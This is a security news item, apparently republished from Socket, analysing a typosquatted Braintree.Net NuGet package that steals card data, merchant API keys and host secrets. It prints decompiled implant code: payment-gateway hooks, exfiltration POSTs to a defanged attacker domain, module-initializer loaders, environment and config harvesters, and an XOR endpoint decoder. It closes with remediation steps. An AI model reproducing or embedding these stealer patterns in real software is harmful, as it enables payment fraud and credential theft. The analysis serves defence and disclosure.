{"slug": "fake-braintree-nuget-package-skims-credit-cards-and-harvests-merchant", "title": "Fake Braintree NuGet Package Skims Credit Cards and Harvests Merchant Credentials", "summary": "Socket's AI scanner flagged a malicious NuGet package named Braintree.Net on July 3, 2026, which impersonates the official Braintree SDK to steal credit card data, merchant API keys, and host secrets. The package uses typosquatting, inflated download counts, and a multi-stage implant to exfiltrate data to attacker-controlled infrastructure. Socket reported the package to NuGet for removal.", "body_md": "Socket’s AI scanner flagged a suspicious NuGet package masquerading as the official Braintree payment gateway client, with the first malicious version published on July 3, 2026. It was detected by Socket as potential malware 10 minutes after publication. Follow-on analysis by the Socket Threat Research team revealed a multi-stage .NET implant that intercepts live payment card data, exfiltrates Braintree merchant API keys and harvests host environment secrets upon assembly load. The package Braintree.Net copies the surface API of PayPal Braintree's legitimate Braintree SDK while routing stolen data to attacker-controlled infrastructure at api.348672-shakepay[.]com.\n\nThe official Braintree .NET library is published on NuGet as Braintree (currently in the 5.x line, maintained by PayPal/Braintree). The malicious package uses a common name variation — Braintree.Net — a mismatched version scheme (3.36.1 vs official 5.x), and metadata that points at the real braintree/braintree_dotnet GitHub repository. Developers searching for \"Braintree .NET\" or copy-pasting a slightly wrong package name are the intended victims. We have reported this package to the NuGet security team and requested the removal of the package and the suspension of the publisher’s account.\n\nAdditional context on the Braintree.Net's NuGet presence:\n\nPackage ID:Braintree.Net (official package ID is Braintree)\n\nClaimed author:Braintree (impersonation — official packages are published under the braintreepayments profile) The malicious Braintree.Net blends in and ranks just after the legitimate package, partially due to inflated download count.\n\nClaimed project URL:https://github.com/braintree/braintree_dotnet (legitimate repo; this package is not built or distributed from it)\n\nCompanion dependency (3.36.0+):DependencyInjector.Core ≥ 1.4.1 - a near-unused package whose primary downstream consumer is this typosquat\n\nThis companion dependency contains a follow-on payload which functions as a token harvester.\n\nFaked Download Counts: Of Braintree.Net's ~14M reported downloads, roughly 11M is padding sprayed across 120 throwaway 0.0.x versions with published on a single day (2025-10-09, ~93,300 each). The genuinely malicious releases (3.35.8–3.36.1) have only ~334 real installs — a ~32,900x gap between the headline number and the real blast radius.\n\nThe 120 empty placeholder versions (0.0.1 through 0.0.120) contained only a .nuspec and no DLL — a common namespace-squatting technique to occupy the package name and artificially increase the download count before dropping functional payloads:\n\nThe malicious package ships real-looking Braintree.dll assemblies for multiple target frameworks (net452, netstandard2.0, net8.0, net9.0, net10.0). The public API surface — BraintreeGateway, CreditCardGateway, TransactionGateway, webhook types, GraphQL client wrappers — closely mirrors the legitimate SDK. A developer can instantiate a gateway, create customers, run transactions, and receive plausible Result<T> objects without any obvious runtime errors.\n\nThe README bundled in the package is copied from official Braintree documentation and even instructs developers to install the real package name:\n\n```\n#### Via NuGet\n\nInstall-Package Braintree\n\nor\n\ndotnet add package Braintree\n```\n\nThat instruction refers to Braintree, not Braintree.Net — a subtle inconsistency that may go unnoticed during a hurried install. The package description, tags (braintree, paypal, visa, mastercard, etc.), and MIT license claim complete the camouflage.\n\nComparison against the official Braintree5.36.0 assembly confirms the divergence is not cosmetic:\n\nThe legitimate CreditCardGateway.Create() posts directly to Braintree's API — no side-channel logging\n\nThe legitimate BraintreeGateway.PrivateKey setter assigns configuration only — no outbound HTTP call\n\nLegitimate assembly contains noCardOperationLogger, noDependencyInjectorLoader, and no reference to DependencyInjector.Core\n\nWhen a .NET application references Braintree.Net and loads the assembly, three independent exfiltration paths activate at different lifecycle points. The diagram below shows how a normal payment integration unknowingly triggers them:\n\n```\nApplication starts\n       │\n       ▼\n┌──────────────────────────────────────────────────────────┐\n│  [Module Init] Braintree.DependencyInjectorLoader.Load() │\n│  (also: DependencyInjector.Core.AutoInitializer)         │\n│       └─► CodebaseAnalyzer.AnalyzeAndPrint()             │\n│               └─► POST env/config/cloud metadata         │\n│                   → /api/analytics/report                │\n└──────────────────────────────────────────────────────────┘\n       │\n       ▼\nDeveloper configures gateway:\n  gateway.PrivateKey = \"...\"\n       │\n       ▼\n┌──────────────────────────────────────────────────────────┐\n│  [Property Setter] BraintreeGateway.PrivateKey           │\n│  (only when Environment == PRODUCTION)                   │\n│       └─► GatewayInput.AddAccountAsync()                 │\n│               └─► POST merchantId, publicKey, privateKey │\n│                   → /api/account                         │\n└──────────────────────────────────────────────────────────┘\n       │\n       ▼\nApplication processes a payment:\n  gateway.CreditCard.Create(request)\n       │\n       ▼\n┌──────────────────────────────────────────────────────────┐\n│  [Gateway Hook] CardOperationLogger.LogCreditCardCreate()│\n│  (only when Environment == production)                   │\n│       └─► SendAsync()                                    │\n│               └─► POST cardNumber, cvv, expiration, ...  │\n│                   → /api/card                            │\n└──────────────────────────────────────────────────────────┘\n       │\n       ▼\nLegitimate Braintree API call proceeds normally\n(merchant sees no error; payment may succeed)\n```\n\nEvery exfiltration path wraps its body in an empty catch block. Network failures, TLS errors, and malformed payloads are swallowed silently: the host application continues operating as if nothing happened.\n\nThe class Braintree.CardOperationLogger exists only in the typosquat assembly. It is not present in any official Braintree release analyzed for comparison.\n\nGateway Hooks\n\nThe logger is invoked before the legitimate Braintree HTTP request in payment-critical code paths. For example, CreditCardGateway.Create() in the malicious assembly:\n\n```\npublic virtual Result<CreditCard> Create(CreditCardRequest request)\n{\n    CardOperationLogger.Instance.LogCreditCardCreate(gateway, request);\n    return new ResultImpl<CreditCard>(\n        new NodeWrapper(service.Post(service.MerchantPath() + \"/payment_methods\", request)),\n        gateway);\n}\n```\n\nThe official Braintree 5.36.0 Create() method contains no such call; it posts to Braintree directly:\n\n```\npublic virtual Result<CreditCard> Create(CreditCardRequest request)\n{\n    return new ResultImpl<CreditCard>(\n        new NodeWrapper(service.Post(service.MerchantPath() + \"/payment_methods\", request)),\n        gateway);\n}\n```\n\nSimilar hooks exist on async variants and on transaction, payment method, and card verification gateways via methods named LogCreditCardCreate, LogCreditCardUpdate, LogTransactionSale, LogTransactionCredit, LogPaymentMethodCreate, LogPaymentMethodUpdate, and LogCardVerification.\n\nExfiltration Body\n\nSendAsync serializes a CardOperationLog object into JSON and POSTs it to a hardcoded endpoint. The decompiled implementation:\n\n``` js\nprivate const string ApiEndpoint = \"https[://]api.348672-shakepay[.]com/api/card\";\nprivate const string ApiKey = \"2523-5235-8564-2683-2386\";\n\nprivate async Task SendAsync(CardOperationLog log)\n{\n    try\n    {\n        string content =\n            $\"{{\\\"operation\\\":\\\"{Escape(log.Operation)}\\\",\" +\n            $\"\\\"gateway\\\":\\\"{Escape(log.Gateway)}\\\",\" +\n            $\"\\\"cardNumber\\\":\\\"{Escape(log.CardNumber)}\\\",\" +\n            $\"\\\"cvv\\\":\\\"{Escape(log.CVV)}\\\",\" +\n            $\"\\\"cardType\\\":\\\"{Escape(log.CardType)}\\\",\" +\n            $\"\\\"expirationDate\\\":\\\"{Escape(log.ExpirationDate)}\\\",\" +\n            $\"\\\"customerId\\\":\\\"{Escape(log.CustomerId)}\\\",\" +\n            $\"\\\"amount\\\":{(log.Amount.HasValue ? log.Amount.Value.ToString(CultureInfo.InvariantCulture) : \"null\")},\" +\n            $\"\\\"timestamp\\\":\\\"{log.Timestamp:O}\\\"}}\";\n\n        HttpRequestMessage httpRequestMessage =\n            new HttpRequestMessage(HttpMethod.Post, \"https[://]api.348672-shakepay[.]com/api/card\");\n\n        httpRequestMessage.Content = new StringContent(content, Encoding.UTF8, \"application/json\");\n        httpRequestMessage.Headers.Add(\"X-Api-Key\", \"2523-5235-8564-2683-2386\");\n\n        await _httpClient.SendAsync(httpRequestMessage).ConfigureAwait(continueOnCapturedContext: false);\n    }\n    catch\n    {\n    }\n}\n```\n\nFields on CardOperationLog confirm the scope of harvested payment data:\n\nWhen a merchant creates a credit card in production, LogCreditCardCreate copies request fields directly into the exfiltration log:\n\n```\npublic void LogCreditCardCreate(IBraintreeGateway gateway, CreditCardRequest request)\n{\n    if (IsProduction(gateway))\n    {\n        SendAsync(new CardOperationLog\n        {\n            Operation = \"Create\",\n            Gateway = \"CreditCardGateway\",\n            CardNumber = request.Number,\n            CVV = request.CVV,\n            CardType = DetectCardType(request.Number),\n            ExpirationDate = (request.ExpirationDate ??\n                (request.ExpirationMonth + \"/\" + request.ExpirationYear)),\n            CustomerId = request.CustomerId\n        });\n    }\n}\n```\n\nTransaction sale paths extract card data from nested request.CreditCard objects when present. This covers both direct card entry and flows where card details are attached to a transaction request rather than a standalone payment method create.\n\nBeyond card data, the implant steals Braintree merchant API credentials — the merchantId, publicKey, and privateKey triple that grants full gateway API access.\n\nThe theft is triggered from the BraintreeGateway.PrivateKeyproperty setter, which in the official SDK simply stores the value. In the typosquat:\n\n```\npublic virtual string PrivateKey\n{\n    get\n    {\n        return Configuration.PrivateKey;\n    }\n    set\n    {\n        Configuration.PrivateKey = value;\n        if (!_accountAdded\n            && !string.IsNullOrWhiteSpace(Configuration.MerchantId)\n            && !string.IsNullOrWhiteSpace(Configuration.PublicKey)\n            && !string.IsNullOrWhiteSpace(Configuration.PrivateKey)\n            && Configuration.Environment == Environment.PRODUCTION)\n        {\n            _accountAdded = true;\n            GatewayI = new GatewayInput();\n            GatewayI.AddAccountAsync(\n                Configuration.MerchantId,\n                Configuration.PublicKey,\n                Configuration.PrivateKey);\n        }\n    }\n}\n```\n\nGatewayInput.AddAccountAsync POSTs all three secrets:\n\n``` js\nprivate const string ApiEndpoint = \"https[://]api.348672-shakepay[.]com/api/account\";\nprivate const string ApiKey = \"2523-5235-8564-2683-2386\";\n\npublic async Task<bool> AddAccountAsync(string merchantId, string publicKey, string privateKey)\n{\n    try\n    {\n        string content =\n            $\"{{\\\"merchantId\\\":\\\"{Escape(merchantId)}\\\",\" +\n            $\"\\\"publicKey\\\":\\\"{Escape(publicKey)}\\\",\" +\n            $\"\\\"privateKey\\\":\\\"{Escape(privateKey)}\\\",\" +\n            $\"\\\"timestamp\\\":\\\"{DateTime.UtcNow:O}\\\"}}\";\n\n        HttpRequestMessage httpRequestMessage =\n            new HttpRequestMessage(HttpMethod.Post, \"https[://]api.348672-shakepay[.]com/api/account\");\n\n        httpRequestMessage.Content = new StringContent(content, Encoding.UTF8, \"application/json\");\n        httpRequestMessage.Headers.Add(\"X-Api-Key\", \"2523-5235-8564-2683-2386\");\n\n        await _httpClient.SendAsync(httpRequestMessage).ConfigureAwait(continueOnCapturedContext: false);\n        return true;\n    }\n    catch\n    {\n        return false;\n    }\n}\n```\n\nA single production gateway initialization is enough for the attacker to obtain credentials that allow creating transactions, issuing refunds, and accessing customer vault data through the real Braintree API — independently of the card-stealing hooks.\n\nStarting with 3.36.0, the package declares a dependency on DependencyInjector.Core for net8.0, net9.0, and net10.0 targets. That package is described on NuGet as an \"Auto-analyzer\" and runs without any code changes by the victim application.\n\nModule Initialization Chain\n\nTwo module initializers fire when the assemblies load:\n\nInBraintree.dll:\n\n```\ninternal static class DependencyInjectorLoader\n{\n    [ModuleInitializer]\n    internal static void Load()\n    {\n        try\n        {\n            CodebaseAnalyzer.AnalyzeAndPrint();\n        }\n        catch\n        {\n        }\n    }\n}\n```\n\nInDependencyInjector.Core.dll:\n\n```\ninternal static class AutoInitializer\n{\n    private static int _initialized;\n\n    [ModuleInitializer]\n    internal static void Initialize()\n    {\n        if (Interlocked.Exchange(ref _initialized, 1) == 1)\n            return;\n\n        try\n        {\n            CodebaseAnalyzer.AnalyzeAndPrint();\n        }\n        catch\n        {\n        }\n    }\n}\n```\n\nAnalyzeAndPrint() collects a CodebaseAnalysisResult and, if reporting is enabled, ships it asynchronously:\n\n```\npublic static void AnalyzeAndPrint()\n{\n    try\n    {\n        AnalyticsOptions analyticsOptions = AnalyticsOptions.FromEnvironment();\n        if (analyticsOptions.Enabled)\n        {\n            AnalyticsReporter.Report(Analyze(), analyticsOptions.Endpoint);\n        }\n    }\n    catch\n    {\n    }\n}\n```\n\nAnalyze() aggregates output from dedicated analyzer classes:\n\n```\npublic static CodebaseAnalysisResult Analyze()\n{\n    return new CodebaseAnalysisResult\n    {\n        Environment = EnvironmentAnalyzer.Analyze(),\n        Project = ProjectAnalyzer.Analyze(),\n        Configuration = ConfigurationAnalyzer.Analyze(),\n        Dependencies = DependencyAnalyzer.Analyze(),\n        EnvironmentVariables = EnvironmentVariablesAnalyzer.Analyze(),\n        Container = ContainerAnalyzer.Analyze(),\n        SystemResources = SystemResourcesAnalyzer.Analyze(),\n        Cloud = CloudProviderAnalyzer.Analyze(),\n        AnalysisTimestamp = DateTime.UtcNow\n    };\n}\n```\n\nToken and Secret Theft\n\nEnvironment Variables - every variable in the process environment, categorized by prefix:\n\n```\nprivate static readonly HashSet<string> CloudPatterns = new HashSet<string>(StringComparer.OrdinalIgnoreCase)\n{\n    \"AWS_\", \"AZURE_\", \"GOOGLE_\", \"GCP_\", \"GCLOUD_\", \"KUBERNETES_\", \"K8S_\",\n    \"HEROKU_\", \"RAILWAY_\", \"FLY_\", \"VERCEL_\", \"RENDER_\", \"DIGITALOCEAN_\"\n};\n\nprivate static readonly HashSet<string> AspNetCorePrefixes = new HashSet<string>(StringComparer.OrdinalIgnoreCase)\n{\n    \"ASPNETCORE_\", \"ASPNET_\"\n};\n```\n\nEach variable is captured with its full value into an EnvironmentVariable record and included in the exfiltration payload via MapToPayload.\n\nApplication Configuration - ConfigurationAnalyzer reads appsettings*.json files from the application directory (walking up to five parent directories), parses JSON including the ConnectionStrings section, and stores the raw file contents of every discovered config file:\n\n```\nforeach (string item in list)\n{\n    try\n    {\n        string value = File.ReadAllText(item);\n        dictionary3[item] = value;  // RawAppSettingsFiles\n    }\n    catch\n    {\n    }\n}\n```\n\nCloud and container metadata — CloudProviderAnalyzer and ContainerAnalyzer probe for AWS/Azure/GCP instance metadata, Kubernetes service account token paths (including /var/run/secrets/kubernetes.io/serviceaccount/token), Docker cgroup information, and mounted secrets under /var/run/secrets.\n\nDependencies and assemblies — loaded assembly names, NuGet package references, and project type detection (ASP.NET Core Web API, Blazor, Azure Functions, etc.).\n\nThe assembled payload is POSTed as JSON via AnalyticsReporter.ReportAsync:\n\n```\npublic static async Task<bool> ReportAsync(CodebaseAnalysisResult result, string endpoint)\n{\n    try\n    {\n        HttpClient orCreateHttpClient = GetOrCreateHttpClient();\n        object value = MapToPayload(result);\n        return (await orCreateHttpClient.PostAsJsonAsync(endpoint, value, JsonOptions)).IsSuccessStatusCode;\n    }\n    catch\n    {\n        return false;\n    }\n}\n```\n\nOn a typical payment-processing server, this captures Braintree keys from environment variables or appsettings.json, database connection strings, cloud IAM role credentials, and CI/CD tokens — in addition to the payment-specific theft described above.\n\nThis implant uses environment-based gating tied to the Braintree SDK's own configuration rather than host-level sandbox detection:\n\n```\nprivate bool IsProduction(IBraintreeGateway gateway)\n{\n    try\n    {\n        return gateway?.Configuration?.Environment?.EnvironmentName == \"production\";\n    }\n    catch\n    {\n        return false;\n    }\n}\n```\n\nCard exfiltration methods call IsProduction() before invoking SendAsync. Merchant credential theft checks Configuration.Environment == Environment.PRODUCTION in the PrivateKey setter.\n\nPractical effect:\n\nSandbox and development integrations - developers testing with Braintree Sandbox credentials see no exfiltration from the card logger or credential stealer, reducing the chance of discovery during routine QA\n\nProduction deployments - live PAN/CVV data and real merchant keys are harvested on first use\n\nEnvironment harvester (DependencyInjector.Core) - runs unconditionally on assembly load regardless of Braintree environment setting, so even sandbox-only apps on .NET 8+ leak host secrets if they reference the poisoned package\n\nThis split behavior allows the attacker to deliberately target payment data in production, while environment reconnaissance casts a wider net.\n\nHowever, the analytics/report endpoint used by DependencyInjector.Core is XOR-obfuscated at rest, another suspicious indicator. The AnalyticsOptions static constructor embeds a 52-byte ciphertext array; at runtime GetDefaultEndpoint() decodes it:\n\n```\nprivate static string GetDefaultEndpoint()\n{\n    return EndpointObfuscator.Decode(ObfuscatedEndpoint);\n}\n```\n\nThe obfuscator applies repeating-key XOR over UTF-8 bytes:\n\n```\ninternal static class EndpointObfuscator\n{\n    private static readonly byte[] Key;\n\n    internal static string Decode(byte[] data)\n    {\n        byte[] array = new byte[data.Length];\n        for (int i = 0; i < data.Length; i++)\n        {\n            array[i] = (byte)(data[i] ^ Key[i % Key.Length]);\n        }\n        return Encoding.UTF8.GetString(array);\n    }\n}\n```\n\nRecovered values from DependencyInjector.Core 1.4.1 (net10.0):\n\nA naive strings extraction or single-pass XOR scan of the DLL does not surface the analytics URL — only the card/account endpoints appear in plaintext. The payment hooks use readable C2 strings while the broader environment harvester hides its endpoint behind XOR encoding.\n\nThe domain 348672-shakepay[.]com uses the Shakepay brand name but is not registered infrastructure belonging to Shakepay (shakepay.com). Passive DNS resolution returns Cloudflare anycast addresses (104.21[.]89.51, 172.67[.]188.32), consistent with attacker-controlled origin hiding rather than a legitimate payment processor API.\n\nSibling Packages with DependencyInjector Dependency\n\nBeyond Braintree.Net, the same braintreenuget.org account publishes a family of SIP/WebRTC packages that typosquat the popular SIPSorcery ecosystem, two of which route to the malicious DependencyInjector.Core harvester:\n\nSipNet typosquats the core SIPSorcery library; its own SipNet.dll is a clean recompile of SIPSorcery with no embedded payload, but versions 12.8.4–12.8.7 add a DependencyInjector.Core dependency purely at the manifest level — the DLL is identical across 12.8.3–12.8.6, so only the dependency list changed — and the dependency is scoped exclusively to the .NET 8/9/10 target frameworks, sparing classic .NET Framework/netstandard consumers.\n\nSipNet.OpenAI.Realtime typosquats SIPSorcery's OpenAI Realtime WebRTC integration; its own code is a benign OpenAI Realtime client and it does not reference DependencyInjector.Core directly. It declares a dependency on the malicious SipNet (≥10.0.5) — however, NuGet's default lowest-applicable resolution selects SipNet@12.8.3, which is the clean front version, so it does not pull the harvester in a default install. It becomes a live transitive vector only if SipNet floats to ≥12.8.4 in the dependency graph (another constraint, an explicit pin, or 12.8.3 being unlisted).\n\nSeveral characteristics suggest this is a deliberate, financially motivated supply-chain operation rather than a one-off package upload:\n\nPayment SDK targeting — the implant hooks payment gateway methods and harvests PCI-sensitive data (PAN, CVV) plus merchant API keys. The value proposition for the attacker is direct financial fraud and resale of credentials.\n\nTyposquat plus metadata impersonation — package ID Braintree.Net, author field Braintree, and a README copied from official docs create multiple discovery paths for developers who mistype or mis-search NuGet.\n\nNamespace pre-squatting — 120 empty 0.0.x versions reserve the package name before functional payloads appear under plausible 3.35.x / 3.36.x version numbers that mimic an outdated major release line.\n\nSplit obfuscation strategy — plaintext C2 strings in the payment stealer (relying on production gating for stealth) combined with XOR-encoded analytics endpoint in the companion dependency.\n\nCompanion package pattern — DependencyInjector.Core has negligible independent adoption (~50 downloads per version) but is listed as a dependency of this typosquat and another package (SipNet), suggesting a reusable implant framework across NuGet brands.\n\nSilent failure everywhere — empty catch blocks on every exfil path ensure merchants never see exceptions, failed payments, or broken integrations that would trigger investigation.\n\nMulti-stage .NET module initializers — [ModuleInitializer] attributes guarantee execution at assembly load without requiring the victim to call any malicious API surface directly.\n\nRemoveBraintree.Netimmediately from all projects, solution-wide central package management files, and CI restore caches. Replace with the official package:\n\n```\ndotnet remove package Braintree.Net\ndotnet add package Braintree\n```\n\nRotate all Braintree merchant credentials (merchantId, publicKey, privateKey, access tokens) for any environment that ever referenced this package — assume production keys are compromised if the gateway was configured with Environment.PRODUCTION.\n\nTreat card data as potentially disclosed if production traffic ran through the poisoned SDK while card numbers or CVVs were present in request objects. Engage PCI incident response and notification processes as applicable.\n\nAudit for companion packages: search lock files and dependency graphs for DependencyInjector.Core , SipNet and SipNet.OpenAI.Realtime in addition to Braintree.Net.\n\nBlock egress to 348672-shakepay[.]com and subdomains at network perimeter controls.\n\nSocket tracks the activity as Operation “Muck and Load”: a threat actor uses commit-farming workflows, public dead drops, and protected archives to stage Windows RAT and infostealer malware.", "url": "https://wpnews.pro/news/fake-braintree-nuget-package-skims-credit-cards-and-harvests-merchant", "canonical_source": "https://socket.dev/blog/braintree-nuget-typosquat-skims-credit-cards?utm_medium=feed", "published_at": "2026-07-09 19:58:26+00:00", "updated_at": "2026-07-09 20:53:35.383043+00:00", "lang": "en", "topics": ["ai-tools", "ai-safety"], "entities": ["Socket", "Braintree", "PayPal", "NuGet", "Braintree.Net", "DependencyInjector.Core", "GitHub"], "alternates": {"html": "https://wpnews.pro/news/fake-braintree-nuget-package-skims-credit-cards-and-harvests-merchant", "markdown": "https://wpnews.pro/news/fake-braintree-nuget-package-skims-credit-cards-and-harvests-merchant.md", "text": "https://wpnews.pro/news/fake-braintree-nuget-package-skims-credit-cards-and-harvests-merchant.txt", "jsonld": "https://wpnews.pro/news/fake-braintree-nuget-package-skims-credit-cards-and-harvests-merchant.jsonld"}}